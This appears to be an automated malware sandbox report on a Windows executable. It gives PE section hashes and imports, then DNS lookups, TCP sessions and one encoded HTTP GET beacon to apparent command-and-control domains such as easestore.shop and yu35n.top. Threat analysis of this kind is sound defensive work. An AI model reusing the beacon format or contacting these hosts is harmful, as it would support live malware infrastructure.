IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14c000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x84c70	0x84e00	a5b367e599e7a2884d45aa92de595777	False	0.6528416774459078	data	6.721001196125339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14c000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc76a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc77d0	0x2d208	Device independent bitmap graphic, 213 x 420 x 32, image size 178920, resolution 5669 x 5669 px/m	English	Great Britain	0.019297771045228305
RT_MENU	0xf49d8	0x50	data	English	Great Britain	0.9
RT_STRING	0xf4a28	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xf4fbc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xf5648	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xf5ad8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xf60d4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xf6730	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xf6b98	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xf6cf0	0x54a63	data			1.00033456101845
RT_GROUP_ICON	0x14b754	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x14b768	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x14b77c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x14b790	0x14	data	English	Great Britain	1.25
RT_VERSION	0x14b7a4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x14b880	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:09:39.729722023 CET	49969	80	192.168.2.6	23.227.38.74
Jan 10, 2025 20:09:39.734637976 CET	80	49969	23.227.38.74	192.168.2.6
Jan 10, 2025 20:09:39.735884905 CET	49969	80	192.168.2.6	23.227.38.74
Jan 10, 2025 20:09:39.744076014 CET	49969	80	192.168.2.6	23.227.38.74
Jan 10, 2025 20:09:39.748837948 CET	80	49969	23.227.38.74	192.168.2.6
Jan 10, 2025 20:09:40.292552948 CET	80	49969	23.227.38.74	192.168.2.6
Jan 10, 2025 20:09:40.292572975 CET	80	49969	23.227.38.74	192.168.2.6
Jan 10, 2025 20:09:40.292830944 CET	49969	80	192.168.2.6	23.227.38.74
Jan 10, 2025 20:09:40.293540001 CET	80	49969	23.227.38.74	192.168.2.6
Jan 10, 2025 20:09:40.294962883 CET	49969	80	192.168.2.6	23.227.38.74
Jan 10, 2025 20:09:40.296312094 CET	49969	80	192.168.2.6	23.227.38.74
Jan 10, 2025 20:09:40.301608086 CET	80	49969	23.227.38.74	192.168.2.6
Jan 10, 2025 20:09:55.710099936 CET	49984	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:55.714998007 CET	80	49984	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:55.715085983 CET	49984	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:55.727380991 CET	49984	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:55.732484102 CET	80	49984	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:56.612174988 CET	80	49984	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:56.612296104 CET	80	49984	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:56.612401962 CET	49984	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:57.232707977 CET	49984	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:58.250221014 CET	49985	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:58.255117893 CET	80	49985	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:58.255269051 CET	49985	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:58.266921997 CET	49985	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:58.271759033 CET	80	49985	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:59.178783894 CET	80	49985	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:59.178831100 CET	80	49985	154.23.178.183	192.168.2.6
Jan 10, 2025 20:09:59.178958893 CET	49985	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:09:59.778371096 CET	49985	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:00.797265053 CET	49986	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:00.802198887 CET	80	49986	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:00.802337885 CET	49986	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:00.814007044 CET	49986	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:00.818839073 CET	80	49986	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:00.818950891 CET	80	49986	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:01.790316105 CET	80	49986	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:01.790472984 CET	80	49986	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:01.790524006 CET	49986	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:02.326837063 CET	49986	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:03.343925953 CET	49987	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:03.348850012 CET	80	49987	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:03.350382090 CET	49987	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:03.358057976 CET	49987	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:03.362807989 CET	80	49987	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:04.434075117 CET	80	49987	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:04.434098959 CET	80	49987	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:04.434676886 CET	49987	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:04.443754911 CET	49987	80	192.168.2.6	154.23.178.183
Jan 10, 2025 20:10:04.448597908 CET	80	49987	154.23.178.183	192.168.2.6
Jan 10, 2025 20:10:09.468982935 CET	49988	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:09.474117994 CET	80	49988	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:09.474267006 CET	49988	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:09.485786915 CET	49988	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:09.490689993 CET	80	49988	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:10.167418003 CET	80	49988	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:10.167706013 CET	80	49988	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:10.167769909 CET	49988	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:10.997209072 CET	49988	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:12.015880108 CET	49989	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:12.020653009 CET	80	49989	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:12.020817995 CET	49989	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:12.032351017 CET	49989	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:12.037564039 CET	80	49989	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:12.732523918 CET	80	49989	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:12.732876062 CET	80	49989	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:12.733011961 CET	49989	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:13.559334993 CET	49989	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:14.563488960 CET	49990	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:14.568363905 CET	80	49990	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:14.568537951 CET	49990	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:14.586193085 CET	49990	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:14.591022968 CET	80	49990	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:14.591169119 CET	80	49990	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:15.224539995 CET	80	49990	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:15.224684954 CET	80	49990	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:15.225068092 CET	49990	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:16.090969086 CET	49990	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:17.109667063 CET	49991	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:17.114500046 CET	80	49991	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:17.114686012 CET	49991	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:17.122510910 CET	49991	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:17.127280951 CET	80	49991	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:17.773442030 CET	80	49991	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:17.773633003 CET	80	49991	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:17.773741007 CET	49991	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:17.776437998 CET	49991	80	192.168.2.6	45.158.77.253
Jan 10, 2025 20:10:17.784817934 CET	80	49991	45.158.77.253	192.168.2.6
Jan 10, 2025 20:10:23.131254911 CET	49992	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:23.136640072 CET	80	49992	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:23.136776924 CET	49992	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:23.148283958 CET	49992	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:23.153107882 CET	80	49992	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:24.158055067 CET	80	49992	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:24.158122063 CET	49992	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:24.660203934 CET	49992	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:24.665038109 CET	80	49992	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:25.673610926 CET	49993	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:25.678400993 CET	80	49993	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:25.678478003 CET	49993	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:25.693370104 CET	49993	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:25.698276043 CET	80	49993	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:27.200423956 CET	49993	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:27.246337891 CET	80	49993	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:28.219345093 CET	49995	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:28.224359035 CET	80	49995	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:28.224478006 CET	49995	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:28.236723900 CET	49995	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:28.241561890 CET	80	49995	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:28.241677046 CET	80	49995	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:29.747303009 CET	49995	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:29.798316002 CET	80	49995	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:30.766520977 CET	49996	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:30.771332026 CET	80	49996	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:30.771739006 CET	49996	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:30.781498909 CET	49996	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:30.786344051 CET	80	49996	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:47.042182922 CET	80	49993	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:47.042543888 CET	49993	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:49.624166965 CET	80	49995	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:49.624237061 CET	49995	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:52.136240959 CET	80	49996	156.242.132.82	192.168.2.6
Jan 10, 2025 20:10:52.136389971 CET	49996	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:52.169337034 CET	49996	80	192.168.2.6	156.242.132.82
Jan 10, 2025 20:10:52.174294949 CET	80	49996	156.242.132.82	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:09:39.711076975 CET	57888	53	192.168.2.6	1.1.1.1
Jan 10, 2025 20:09:39.723521948 CET	53	57888	1.1.1.1	192.168.2.6
Jan 10, 2025 20:09:55.344496012 CET	58778	53	192.168.2.6	1.1.1.1
Jan 10, 2025 20:09:55.707279921 CET	53	58778	1.1.1.1	192.168.2.6
Jan 10, 2025 20:10:09.454257011 CET	64178	53	192.168.2.6	1.1.1.1
Jan 10, 2025 20:10:09.466022968 CET	53	64178	1.1.1.1	192.168.2.6
Jan 10, 2025 20:10:22.782578945 CET	52087	53	192.168.2.6	1.1.1.1
Jan 10, 2025 20:10:23.128447056 CET	53	52087	1.1.1.1	192.168.2.6
Jan 10, 2025 20:10:58.376121998 CET	61674	53	192.168.2.6	1.1.1.1
Jan 10, 2025 20:10:58.387322903 CET	53	61674	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 20:09:39.711076975 CET	192.168.2.6	1.1.1.1	0xddaf	Standard query (0)	www.easestore.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:09:55.344496012 CET	192.168.2.6	1.1.1.1	0xe722	Standard query (0)	www.yu35n.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:10:09.454257011 CET	192.168.2.6	1.1.1.1	0x6314	Standard query (0)	www.moritynomxd.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:10:22.782578945 CET	192.168.2.6	1.1.1.1	0xc9b0	Standard query (0)	www.shanhaiguan.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:10:58.376121998 CET	192.168.2.6	1.1.1.1	0x6bd9	Standard query (0)	www.wearenotgoingback.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 20:09:39.723521948 CET	1.1.1.1	192.168.2.6	0xddaf	No error (0)	www.easestore.shop	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:09:39.723521948 CET	1.1.1.1	192.168.2.6	0xddaf	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:09:55.707279921 CET	1.1.1.1	192.168.2.6	0xe722	No error (0)	www.yu35n.top	yu35n.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:09:55.707279921 CET	1.1.1.1	192.168.2.6	0xe722	No error (0)	yu35n.top		154.23.178.183	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:10:09.466022968 CET	1.1.1.1	192.168.2.6	0x6314	No error (0)	www.moritynomxd.xyz		45.158.77.253	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:10:23.128447056 CET	1.1.1.1	192.168.2.6	0xc9b0	No error (0)	www.shanhaiguan.net		156.242.132.82	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:10:58.387322903 CET	1.1.1.1	192.168.2.6	0x6bd9	No error (0)	www.wearenotgoingback.info	wearenotgoingback.info		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:10:58.387322903 CET	1.1.1.1	192.168.2.6	0x6bd9	No error (0)	wearenotgoingback.info		76.223.105.230	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:10:58.387322903 CET	1.1.1.1	192.168.2.6	0x6bd9	No error (0)	wearenotgoingback.info		13.248.243.5	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.easestore.shop

www.yu35n.top

www.moritynomxd.xyz

www.shanhaiguan.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49969	23.227.38.74	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:09:39.744076014 CET	371	OUT	GET /0uas/?bxDtSjJ8=FK3Zuh6BkOWpER34C4EAhDGO4fUWDG3gpGQoKnLE1ObgDCKX41lpJTACl9ojRQ7K5i+hNgB3lCh6TNQwIH2qK1aJmzOxGvULLN47dZXmS7DKEcomGl93d/9sBop2npa8gzI/odg=&zj=orBTgZEhYzzl76 HTTP/1.1 Host: www.easestore.shop Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
